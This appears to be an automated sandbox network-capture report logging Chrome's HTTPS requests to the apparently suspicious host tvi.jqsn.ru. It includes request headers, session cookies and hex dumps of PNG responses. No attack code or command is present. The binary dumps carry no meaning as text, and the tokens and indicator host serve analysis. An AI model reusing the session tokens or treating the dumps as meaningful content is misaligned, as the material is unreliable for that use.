                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 6b f0 8e 4b 95 2a 55 b8 8c 85 7e 63 7f 9f 07 92 4d ee d0 ee ad 20 ab d9 ab d4 ac 83 fa 8d 5b d0 74 b7 19 25 29 31 91 e6 c0 bf 19 76 19 f6 0e 8e 34 07 7e 91 a2 c5 79 87 3c f9 eb 17 e9 6d fa 8c 1f 22 a4 93 4a e5 1d e9 73 78 ff 6a ca ef e5 af d0 60 0d d5 cf dc cc 14 57 0f 74 51 49 d7 54 0b 5f e4 29 10 a8 11 ee 8c e8 55 82 9c b7 ca 4e 56 96 b0 33 37 47 5e 33 73 e4 ce 65 02 8e 03 d2 38 0e 09 c9 c9 88 4f 4e 46 cc e7 cf bc f5 65 8c 82 18 d1 1b a3 d7 f9 b5 59 a3 81 95 5f 55 f4 23 ed c0 c1 43 dc c8 5f 46 d0 ce bd 7d 7c b0 71 c3 06 ad 60 22 7b eb be a8 47 09 3c 7d f4 10 ae 6e 45 d1 ac 5d e7 4c 89 71 48 32 1a 72 9b fe cb 97 cf 08 6c da 0a b5 ea 35 94 03 87 1c 1c 43 d2 e3 92 ef 34 c9 9a 77 eb fa 15 7a 9b 9e 6c ef cb 28 24 5d 2d 21 78 b2 a0 4e 95 72 e4 f4 53 fc 32 55
                                                                                                                          Data Ascii: kK*U~cM [t%)1v4~y<m"Jsxj`WtQIT_)UNV37G^3se8ONFeY_U#C_F}|q`"{G<}nE]LqH2rl5C4wzl($]-!xNrS2U
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 02 bf 78 46 92 03 bf 71 ab 60 e9 2d fe 8c 3a e1 d7 2e d1 e7 f9 e4 56 7f cd 3a 81 99 52 e8 92 7a f7 6e 87 e3 c2 e9 63 78 f6 58 b2 f8 4f b6 1c df 12 0c fb fc fc ec c3 7f ff e1 0b ba 0c 3b 80 17 af 3e d2 2e c8 11 b5 7d 3a c9 af 2d 50 c6 27 5f f2 0d 80 b5 55 5e 8d f1 67 44 af 0c da 99 eb 84 94 f0 44 ef d2 a5 51 dc 56 18 27 24 66 68 78 f7 fd 07 fc 7b ef 1e b6 3d fe fe b8 49 3d 0b 0d bb 15 23 7a c3 f6 9f 10 b4 d7 78 70 15 82 11 aa ea 10 fd e6 2d 17 18 50 0f 64 d6 4b ca 96 ad db 50 b6 8c 97 56 b1 b8 7e 23 9c eb 12 d2 99 f6 67 69 69 85 d1 53 e7 ca a9 1d 11 7e 8d 3e 8b 27 04 5e a3 4e 7d 04 34 6a 2e 97 03 9f 24 cc d9 b7 7d a3 e4 56 7f 31 4f 34 6b d7 29 53 0a 5d 52 87 6c bb 23 8b fa 64 4b 5e 1b 73 7c 4c 4c a6 1f 91 5b f5 3b ff 69 a9 2a 64 99 ea 93 85 77 13 e6 9e c3
                                                                                                                          Data Ascii: xFq`-:.V:RzncxXO;>.}:-P'_U^gDDQV'$fhx{=I=#zxp-PdKPV~#giiS~>'^N}4j.$}V1O4k)S]Rl#dK^s|LL[;i*dw
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 2f 07 ad 41 47 72 d8 93 67 f3 8d eb 15 43 93 80 62 b0 b2 d4 3c 53 5a aa 65 4d e4 c9 5f 8b 77 ec 19 d1 e7 1c 06 b3 aa 57 45 07 0f f9 ac 8a 5a 0b 1c 2d 0b fe f7 de 7d 4c bd 16 a6 e5 5e 84 21 9e 11 bd 30 fc 60 c8 5a f0 3e d8 0a 19 8c 7e fd fa 73 e7 ce 49 b6 9e 8d 19 3b 0e 5d bb 84 e8 dc fe a7 cf 5f 70 5d 43 42 10 97 7e db dd cc cc 0c 26 b9 72 a1 6e 83 a6 a8 5e 3b 00 b9 72 c9 6f 4f 23 5b e5 c8 6a fa d8 b7 92 63 74 49 29 ea 56 08 bd 82 4b a0 55 90 a7 90 e1 ce 52 37 6d dc b2 cf e8 88 11 7d f6 e1 40 08 9e 10 3d df 25 39 25 05 4f a3 62 f0 fa 4d 1c 3e 26 7d 42 4a 4a 2a f2 da 58 c1 3e bf 2d 8a 16 76 42 3e 5b 1b be bb a4 f2 12 53 52 30 fa e2 65 ec 7f fe 5c 2b f2 85 24 94 11 bd 90 bc 61 98 ba e8 9c e8 f4 05 d3 83 c8 48 ae 75 4b c9 fe f1 bc 79 6d b1 6d c7 0e b8 ba 38
                                                                                                                          Data Ascii: /AGrgCb<SZeM_wWEZ-}L^!0`Z>~sI;]_p]CB~&rn^;roO#[jctI)VKUR7m}@=%9%ObM>&}BJJ*X>-vB>[SR0e\+$aHuKymm8
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: b5 cd b2 d8 92 67 f7 a6 5f 6e c0 f4 eb 2d 98 70 ca af 90 56 cd 3f b9 90 96 a7 3c 52 2d 7c 60 65 ed a8 57 6c 19 d1 7f f7 9c 9d b9 39 0e 37 6d 0c 27 2b 2b d5 dc a9 a0 76 6a 5a 1a 76 85 9e 53 4b 66 f9 52 c5 51 aa 98 ab 5a 6d 15 35 ba f7 e1 03 1a ed 3f a8 a8 9a 41 7e cf 88 de 20 dd 26 28 a5 f5 3a 30 6b 1b 89 09 13 27 72 db b7 6d a3 dd f4 ec d5 1b bf 8c 18 2e 6a 7b b3 c3 33 e9 f3 67 ce 34 f9 1e 4c 93 1f 22 57 ca 53 5e 60 27 47 cc a6 99 97 40 9a 79 69 58 5b d9 09 02 57 46 f4 df 5d 5b b5 50 21 6c 69 50 9f 17 5f ff 28 e4 c0 c9 4b f8 f4 e5 fb 09 88 ca 76 e2 5f a5 3c 1c 0b 66 7f b6 82 b2 72 b2 aa 47 96 0c 04 ed 3f 80 07 1f c4 97 ff 9e 11 bd 26 91 c1 da 12 04 04 31 40 6b c3 15 09 89 49 5c ed 5a 7e 48 49 91 64 cd 5a b7 7e 03 7c 2b fa 88 d6 5e 65 31 fc f4 29 9e cb 95
                                                                                                                          Data Ascii: g_n-pV?<R-|`eWl97m'++vjZvSKfRQZm5?A~ &(:0k'rm.j{3g4L"WS^`'G@yiX[WF][P!liP_(Kv_<frG?&1@kI\Z~HIdZ~|+^e1)
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: c8 a1 4b f6 e9 9a e7 c9 83 af 5f 32 9f ce 56 b1 a2 2f 66 cc 9a 85 22 85 5d 0c c6 4e c3 09 1d e1 69 ca 88 fe bb 4f cc 72 e5 c2 9e 46 41 f0 ca 9f 4f 65 47 a9 92 0c 47 65 e1 d9 34 b0 2f 60 47 c9 5e dd 72 f9 cd 5b 04 87 2a 9e 00 a8 2b 5f 9f ed 18 d1 eb 13 7d 71 f4 6d 10 04 78 23 fc 26 d7 a7 77 2f 7c fe fc 59 8a 7a e5 1a fe a8 e0 5b 15 6e c5 24 7b 74 93 93 bf e2 f1 83 7b 08 bb 7c 1e 0f ee dc 92 d6 f3 f6 f1 c1 46 b6 c5 4e 1c d1 aa c0 0a 46 f4 f2 00 cd aa 5e 15 1d 3c 54 df c3 be f7 f8 05 de 9e c7 ab 12 78 7e be 65 e1 5c a8 a0 2a 4d a4 75 ff bd 77 1f 53 af 85 a9 d5 56 e8 8d 18 d1 0b dd 43 c2 d7 cf 20 88 be 73 e7 10 2e 3c 5c 92 c3 da 2e 5f 7e b4 e9 dc 03 ee c5 b3 5f 51 7c ed e2 59 ec dd b6 51 8a 7e a7 ce 21 f8 75 fc 38 83 b0 55 f8 21 23 5c 0d 19 d1 cb fb 46 9d 13
                                                                                                                          Data Ascii: K_2V/f"]NiOrFAOeGGe4/`G^r[*+_}qmx#&w/|Yz[n${t{|FNF^<Tx~e\*MuwSVC s.<\._~_Q|YQ~!u8U!#\F


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.2.449813172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:56 UTC1123OUTGET /gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:58 UTC760INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:58 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="gh3d1Su1ZMSNEeyJPN3dlD5HYNxJxn0j0e3KmnqYP7SY4gSOJsbl0uFlr87ref210"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5WLunQm%2FN2C9rnHoBrK85bGAGtHWGSnoJ9As41fHmfYvk2xpVPGqmtKppoPTmAuUU8SqaQzsBfV2uXJRWn1EsKcrTcJVde03X7Zwxb8p73jyojtI91Yx%2F9kb6apUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 87585512dd42b0f1-ATL
                                                                                                                          2024-04-17 00:34:58 UTC609INData Raw: 33 32 37 63 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 01 bb 08 06 00 00 00 a1 7b f0 cd 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 00 09 70 48 59 73 00 00 3b b6 00 00 3b b6 01 16 33 14 2b 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 77 77 77 2e 69 6e 6b 73 63 61 70 65 2e 6f 72 67 9b ee 3c 1a 00 00 20 00 49 44 41 54 78 9c ec dd 77 98 5d 55 bd ff f1 f7 4c 1a 49 28 21 04 42 ef bd 08 4a bb 0a 52 94 aa 02 16 50 44 e1 7a 2d a8 28 a0 82 a2 34 51 01 f1 2a 4d 51 2e 20 0a 28 fa 13 45 45 04 41 50 3a ea 05 04 0d 08 48 49 a4 05 09 10 20 09 e9 c9 ef 8f 75 72 33 09 93 72 ce 59 fb 7c f7 de e7 fd 7a 9e ef 33 93 32 c9 67 d6 de 7b f6 cc 59 df bd 56 0f ea 36 c3 81 75 80 b5 80 55 80 95 80 51 8d 5a 19 58 1e 18 01 0c 06 96 6d d4 a0
                                                                                                                          Data Ascii: 327cPNGIHDRp{sBIT|dpHYs;;3+tEXtSoftwarewww.inkscape.org< IDATxw]ULI(!BJRPDz-(4Q*MQ. (EEAP:HI ur3rY|z32g{YV6uUQZXm
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 59 a4 95 39 6e 67 fe 04 f4 53 a1 89 54 46 83 49 cd 1a 3b 03 6f 26 35 41 ad 1c 9a a8 bc 26 01 77 02 b7 02 7f 24 35 4a cd 0e 4d 24 49 92 24 49 92 24 49 92 24 d5 9c cd 00 e5 d2 03 bc 01 d8 b7 51 3b 92 b6 49 51 f3 c6 91 1a 39 6e 05 6e 6c fc 5a dd 65 08 b0 13 b0 1b a9 01 6a 07 60 68 64 a0 0a 7b 01 f8 3d 70 2d 70 3d 6e b9 22 49 92 24 49 92 24 49 92 24 65 67 03 47 bc 81 c0 ee c0 81 c0 01 c0 e8 d8 38 b5 f5 08 69 02 fa 06 d2 8a 02 93 62 e3 a8 20 5b 00 7b 91 56 ae d9 15 18 16 1b a7 96 e6 90 56 e4 b8 12 f8 39 36 47 49 92 24 49 92 24 49 92 24 49 59 d8 c0 11 63 20 f0 16 52 d3 c6 bb 80 51 b1 71 ba ce 2c d2 f6 10 bf 05 ae 02 fe 19 1b 47 6d 18 0a ec 01 ec 0f bc 0d 58 3d 36 4e 57 ba 0b f8 05 a9 99 63 6c 70 16 49 92 24 49 92 24 49 92 24 49 5a 2a 9b 02 67 00 cf 02 73 ad d2
                                                                                                                          Data Ascii: Y9ngSTFI;o&5A&w$5JM$I$I$I$Q;IQ9nnlZej`hd{=p-p=n"I$I$I$egG8ib [{VV96GI$I$I$IYc RQq,GmX=6NWclpI$I$I$IZ*gs
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 1d 20 a3 77 03 3f 06 86 46 07 91 4a e2 19 e0 cb c0 3b 81 b7 07 67 91 ca e4 7f 81 77 00 13 a2 83 48 92 24 49 92 24 49 92 24 49 f3 d4 a5 81 e3 30 e0 62 60 60 74 10 49 52 25 3c 0e ec d9 78 2b 49 92 24 49 92 24 49 92 24 85 eb 8d 0e 90 c1 d1 c0 25 d8 bc 21 49 5a 7a eb 03 b7 03 5b 45 07 91 24 49 92 24 49 92 24 49 92 a0 fa 0d 1c 67 00 e7 50 9f 95 44 24 49 9d b3 1a f0 47 60 db e8 20 92 24 49 92 24 49 92 24 49 52 95 1b 1f 4e 03 8e 8f 0e 21 49 aa bc 97 80 3d 80 7b a2 83 48 92 24 49 92 24 49 92 24 a9 7b 55 75 05 8e af 60 f3 86 24 29 8f 11 c0 75 b8 9d 8a 24 49 92 24 49 92 24 49 92 02 55 71 05 8e 63 81 6f 46 87 90 24 d5 ce 04 60 77 e0 81 e8 20 92 24 49 92 24 49 92 24 49 ea 3e 55 6b e0 f8 2c 70 56 74 08 49 52 6d fd 9b d4 c4 f1 60 74 10 49 92 24 49 92 24 49 92 24 75 97
                                                                                                                          Data Ascii: w?FJ;gwH$I$I$I0b``tIR%<x+I$I$I$%!IZz[E$I$I$IgPD$IG` $I$I$IRN!I={H$I$I${Uu`$)u$I$I$IUqcoF$`w $I$I$I>Uk,pVtIRm`tI$I$I$u
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 24 49 92 24 49 92 24 49 92 54 19 eb 00 93 88 9f 6c eb 74 5d 0b ac 91 61 fc d4 59 cb 93 9a 6e ba 7d 8b 88 4e d7 6c e0 4a dc 26 a5 aa f6 07 c6 13 7f 1e 75 ba 7e 96 63 f0 24 49 92 24 49 92 24 49 92 a4 4e e8 01 ae 23 7e 92 ad 93 f5 32 70 78 e3 73 57 75 f5 02 07 01 0f 11 7f 4e d5 b9 66 03 57 03 af 5f ba c3 a2 12 1b 01 5c 40 fc 39 d5 e9 7a 77 8e c1 93 24 49 92 24 49 92 24 49 92 8a f6 51 e2 27 d7 3a 59 37 00 6b 67 19 39 95 c5 bc 46 8e 7f 10 7f 7e d5 a9 66 00 97 01 9b 2c fd a1 50 45 bc 03 78 86 f8 73 ac 53 35 1e 18 99 65 e4 24 49 92 24 49 92 24 49 92 a4 82 ac 01 4c 24 7e 72 ad 13 35 13 38 06 57 dd a8 b3 5e e0 60 60 0c f1 e7 5b 95 6b 2a f0 5d d2 d6 4a aa af 55 81 9b 89 3f df 3a 55 97 66 19 35 49 92 24 49 92 24 49 92 24 a9 20 57 13 3f a9 d6 89 7a 16 d8 2d cf 90 a9
                                                                                                                          Data Ascii: $I$I$ITlt]aYn}NlJ&u~c$I$I$IN#~2pxsWuNfW_\@9zw$I$I$IQ':Y7kg9F~f,PExsS5e$I$I$IL$~r58W^``[k*]JU?:Uf5I$I$I$ W?z-
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 23 db 1d 48 29 d0 10 e0 1f c4 5f 4b 39 ea e0 cc 63 23 49 92 24 49 92 24 49 92 a4 2e f3 7a e2 27 bd 72 d4 5f 80 01 99 c7 46 e5 b5 12 f0 00 f1 e7 5d 54 cd 01 ce 00 7a db 1d 48 a9 04 de 08 cc 26 fe ba 6a b7 ee c8 3d 30 92 24 49 92 24 49 92 24 49 ea 2e 3f 20 7e d2 ab dd 9a 01 6c 95 7b 60 54 5a cb 92 1a 76 a2 cf bb a8 9a 00 ec d1 f6 28 4a e5 72 3e f1 d7 56 8e da 36 f7 c0 48 92 24 49 92 24 49 92 24 a9 3b 8c 02 a6 12 3f e1 d5 6e 7d 25 f7 c0 a8 b4 06 00 57 11 7f ce 45 d5 c3 c0 46 6d 8f a2 54 3e cb 03 4f 10 7f 8d b5 5b 97 64 1e 17 49 92 24 49 92 24 49 92 24 75 89 e3 89 9f ec 6a b7 1e 02 96 c9 3d 30 2a ad ef 10 7f ce 45 d5 f5 c0 88 f6 87 50 2a ad b7 11 7f 9d b5 5b d3 80 d1 b9 07 46 92 24 49 92 24 49 92 24 49 f5 36 80 7a 3c ed bc 6b ee 81 51 69 7d 96 f8 f3 2d aa be
                                                                                                                          Data Ascii: #H)_K9c#I$I$I.z'r_F]TzH&j=0$I$I$I.? ~l{`TZv(Jr>V6H$I$I$;?n}%WEFmT>O[dI$I$I$uj=0*EP*[F$I$I$I6z<kQi}-
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 12 b0 72 e6 b1 91 16 e5 63 c4 9f f3 39 ea 90 dc 03 23 29 d6 68 aa b7 2c d0 bc 9a de c8 af 7a fa 04 f1 e7 58 a7 6a 1a 69 89 73 49 cd f9 1a f1 d7 6f ab 75 79 01 e3 21 95 d9 86 a4 c6 db 47 89 bf fe ac f9 75 1f 70 3c e9 29 2d 49 2a 93 cd 48 4f 60 46 7f 9d b4 aa 55 8f 01 97 00 ff 45 fa de 43 92 a4 6e 72 10 f1 f7 e2 5c 75 46 e6 b1 91 fa 33 84 6a 3f 20 d8 b7 1e 21 35 71 49 aa 89 0f 13 ff 85 a5 d5 fa 49 01 e3 a1 72 d8 99 d4 a0 13 7d 8e 75 a2 a6 e2 de 7e 52 ab d6 02 66 12 7f 1d b7 52 2f 02 83 f2 0f 89 54 2a 2b 02 47 50 ed d5 de ba a5 66 03 37 02 87 02 c3 fa 3b 98 92 d4 61 a7 12 ff b5 d1 aa 7e 3d 49 5a c9 e5 9d c0 b2 48 92 54 6f 57 11 7f ef cd 55 8f 66 1e 1b a9 3f fb 11 7f ae e7 ac 6d f2 0e 8f a4 48 bf 22 fe 8b 4a ab b5 53 01 e3 a1 78 ab 03 e3 89 3f bf 3a 51 53 80
                                                                                                                          Data Ascii: rc9#)h,zXjisIouy!Gup<)-I*HO`FUECnr\uF3j? !5qIIr}u~RfR/T*+GPf7;a~=IZHToWUf?mH"JSx?:QS
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 2c ea 0e 07 93 26 b4 5c 8d 43 92 54 77 1b 02 57 91 9a cb 37 0d ce 22 49 92 24 49 2a 91 fe 1a 38 d6 01 d6 ee 74 90 0c ae c5 09 f1 3a 38 09 d8 2e 3a 44 81 ee 03 0e 04 66 46 07 91 ba d8 ef 80 d9 d1 21 5a b0 4b 74 00 75 95 fd 49 13 e9 1f 88 0e a2 ae 33 9a b4 1a c7 c5 c0 f0 e0 2c 92 24 15 6d 6f e0 ef c0 59 c0 0a c1 59 24 49 92 24 49 25 d0 5f 03 c7 f6 1d 4f 91 87 db a7 54 df 76 c0 17 a3 43 14 e8 29 60 3f 60 52 74 10 a9 cb bd 08 dc 19 1d a2 05 db 46 07 50 57 58 01 b8 80 f4 44 e8 6a c1 59 d4 dd 3e 0c dc 03 bc 21 3a 88 24 49 05 1b 04 7c 96 b4 65 dd 7b 82 b3 48 92 24 49 92 82 f5 d7 c0 f1 fa 8e a7 68 df 74 e0 0f d1 21 d4 96 e1 a4 7d cf 07 45 07 29 c8 44 d2 93 35 4f 45 07 91 04 54 b3 e9 6f 2d 60 95 e8 10 aa b5 9d 80 31 a4 6d be a4 32 d8 84 d4 70 77 54 74 10 49 92 3a
                                                                                                                          Data Ascii: ,&\CTwW7"I$I*8t:8.:DfF!ZKtuI3,$moYY$I$I%_OTvC)`?`RtFPWXDjY>!:$I|e{H$Iht!}E)D5OETo-`1m2pwTtI:
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 66 53 81 83 80 57 a2 83 48 ca e2 29 60 52 74 88 26 55 f1 be ad e2 1c 0d 7c 2b 3a 84 54 62 a7 03 ef 8a 0e 21 49 52 87 0d 00 2e 05 0e 89 0e 22 49 92 24 49 25 f1 1b 60 6e 1b 75 63 3f ff e6 53 fd fc bd c9 c0 06 4b c8 f2 5e 60 7a 3f 1f 3b be ca 0d 1c 8f 46 07 d0 12 0d 00 ce 6f bc ad 93 a3 70 05 18 a9 6e aa 76 4f d9 30 3a 80 4a e3 10 e0 ec e8 10 52 c9 f5 02 3f 02 b6 89 0e 22 49 52 87 0d 00 2e 23 6d 2b 26 49 92 24 49 dd 6e f5 02 3e 7e 74 3f bf 37 1c 38 72 09 ff d6 89 a4 2d 30 17 b6 ea bc 06 8e 35 9b 08 56 16 8f 44 07 d0 12 1d 4e 5a 81 a3 4e 2e 03 be 1f 1d 42 52 76 55 bb a7 8c 00 96 8d 0e a1 70 6f 25 2d 8d dd 13 1d 44 aa 80 e1 c0 55 f4 ff 03 95 24 49 75 36 af 89 e3 1d d1 41 24 49 92 24 a9 8b fc 17 b0 dc 22 fe ec 2d c0 56 8b fa c0 81 8d b7 ab e6 4e d4 01 55 7b 5a
                                                                                                                          Data Ascii: fSWH)`Rt&U|+:Tb!IR."I$I%`nuc?SK^`z?;FopnvO0:JR?"IR.#m+&I$In>~t?78r-05VDNZN.BRvUpo%-DU$Iu6A$I$"-VNU{Z
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 51 c5 49 b1 b9 c0 83 8d 3a 9f b4 e4 de de c0 3b 1a b5 72 5c b4 da 18 0c 5c 44 5a f5 64 76 70 16 49 dd ed 24 e0 cc e8 10 1d b0 2c 69 75 a9 91 c0 28 60 0d d2 c3 21 6b 93 b6 12 db 02 57 9c eb b4 23 80 eb 49 df 37 49 92 24 49 92 da 77 26 fd 37 70 2c f1 e7 fe d3 49 2f 0a 57 a5 7c 2a ae 5c b6 25 bd c8 1d 7d 5e e4 aa f7 e5 1d 1e 75 a1 65 80 af 92 26 0c 17 77 ae fd 18 97 c3 2f 9b bd 88 ff 1a d4 6c f9 a2 76 3d 0d 06 ee 22 fe fc aa 7a dd 0a 7c 90 fa 3f e5 3b 08 38 80 d4 cd 3d 93 f8 71 af 7a cd db 97 52 52 f9 8d 25 fe 6b 46 11 75 4c ce 41 aa b8 95 48 ab 4f 1d 05 fc 84 d4 10 1f 7d 7c ea 5e 13 80 d5 97 7c 68 24 49 15 34 84 f8 fb 4c ee 5a 2f eb 08 49 af 75 19 f1 e7 79 ce 3a 36 ef f0 48 b5 72 16 0b 5e 2f ff d3 c4 c7 f6 7d 4d b6 bf 45 28 fe b4 d0 bf 7d 57 3f 7f e7 e5 be
                                                                                                                          Data Ascii: QI:;r\\DZdvpI$,iu(`!kW#I7I$Iw&7p,I/W|*\%}^ue&w/lv="z|?;8=qzRR%kFuLAHO}|^|h$I4LZ/Iuy:6Hr^/}ME(}W?
                                                                                                                          2024-04-17 00:34:58 UTC1369INData Raw: 3b 3a 84 24 49 92 24 75 8b 5e aa f7 44 d9 ac e8 00 5d ec 3d a4 49 ed aa 9b 0a 7c 36 3a 84 4a 6b 28 69 59 f9 7b 48 2f e8 75 da 09 b8 aa 42 a4 aa 2d a5 6c 03 47 b5 6d 0a 7c 3a 3a 44 09 3d 09 ec 0e 7c 9d ea 5d 93 55 36 06 d8 1e f8 59 74 90 12 3a 11 bf de 4a 52 1d cd 25 6d 95 b9 09 a9 71 5f 8b b6 0b 70 60 74 08 49 92 24 49 ea 06 bd a4 2d 02 a4 25 e9 a1 3e ab 6f 7c 9d b4 6c aa b4 b0 bd 48 13 58 5f 06 86 04 65 58 1f 57 e1 88 54 b5 c9 e2 aa 35 61 6a 41 67 e1 b6 49 0b bb 11 d8 06 b8 3d 3a 48 97 9a 0c 1c 0c 7c 0e 98 19 9c a5 4c 36 07 f6 8b 0e 21 49 2a cc 44 e0 e3 c0 bb 80 e7 83 b3 94 d9 37 88 fb 39 59 92 24 49 92 ba 46 15 b7 50 71 ff f3 18 07 90 f6 a0 af ba 47 81 6f 46 87 50 e9 8c 06 2e 07 ae 07 36 08 ce 02 ae c2 11 a9 6a f7 98 aa dd c3 35 df 3e c0 be d1 21 4a e6
                                                                                                                          Data Ascii: ;:$I$u^D]=I|6:Jk(iY{H/uB-lGm|::D=|]U6Yt:JR%mq_p`tI$I-%>o|lHX_eXWT5ajAgI=:H|L6!I*D79Y$IFPqGoFP.6j5>!J


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          65192.168.2.449814172.67.130.2124433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:57 UTC1131OUTGET /st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252 HTTP/1.1
                                                                                                                          Host: tvi.jqsn.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: XSRF-TOKEN=eyJpdiI6IkttQzl2ajhJczhiV0NXS3NoTmNQMkE9PSIsInZhbHVlIjoiMEkwMU5RNmtuSE9TcEtVdGlHdWVSRDExZHE3Ukk2YTEzVE9aSHY0V2dGOFpZOWtXSnFqcGVycHU1VFYrdEtIWHFwRS9udUtrMFRsOTlhY1g2aUZyU0FGblRGYXg0bFM1Ym5rbmhUd051Z0hPcnQvalJDWFBuTXVKQ1d1YXI0S3MiLCJtYWMiOiIxYWZlODJmMTZiYjAwODA5NGZkM2IzNjgzNDNmOGJlM2Q5ZDdlMDU5OTU5Y2RjNmRiOTg3MzBkNjU3OWNmZjZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdPOEpFbEs1K3NpNkpnVUNoWmNsclE9PSIsInZhbHVlIjoiSit0R1pFUk0xSlRDVXZCSG1lTmQydFVaL29IOTVqNEF4R1BzZTlCWVVKTThvNUdjOG5pcldUYndYbWc3WFRqMWZIZEQvZWY2bXJEdFhza1BtdnBsQzZJaUt4M3VseUgzL1FvOWYxamZjeTMrQU5nMTBtNWcrVDhsUG1aVXdVRTkiLCJtYWMiOiI4MmE2NjIyZTBiOTgyOGI0N2U5YTkwZjE0MDEzOTA2NzhmZTk1MGRmYzZjNDJiMzk0OGY5Yzk2MGExY2ZlOTExIiwidGFnIjoiIn0%3D
                                                                                                                          2024-04-17 00:34:59 UTC772INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:59 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Disposition: inline; filename="st3CKdA1E60seZo3gCfEdAgXfvZofZpPsO67oS2XmMLiToqXxnMH34BvGEv93TuvNhmLgh252"
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VfSW17u%2FJbQlKjlAX2MhIaaou%2BtMjSJ3U9fUs5Etgj9wpW8I2O%2FIRVyd04sSLcCbkJxI1Fyj0MMvC%2FfkYgTvcKulJKA1mKLQGfJuveHgtVc6QBobl29vkg3q9YY7aA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          alt-svc: h3=":443"; ma=86400
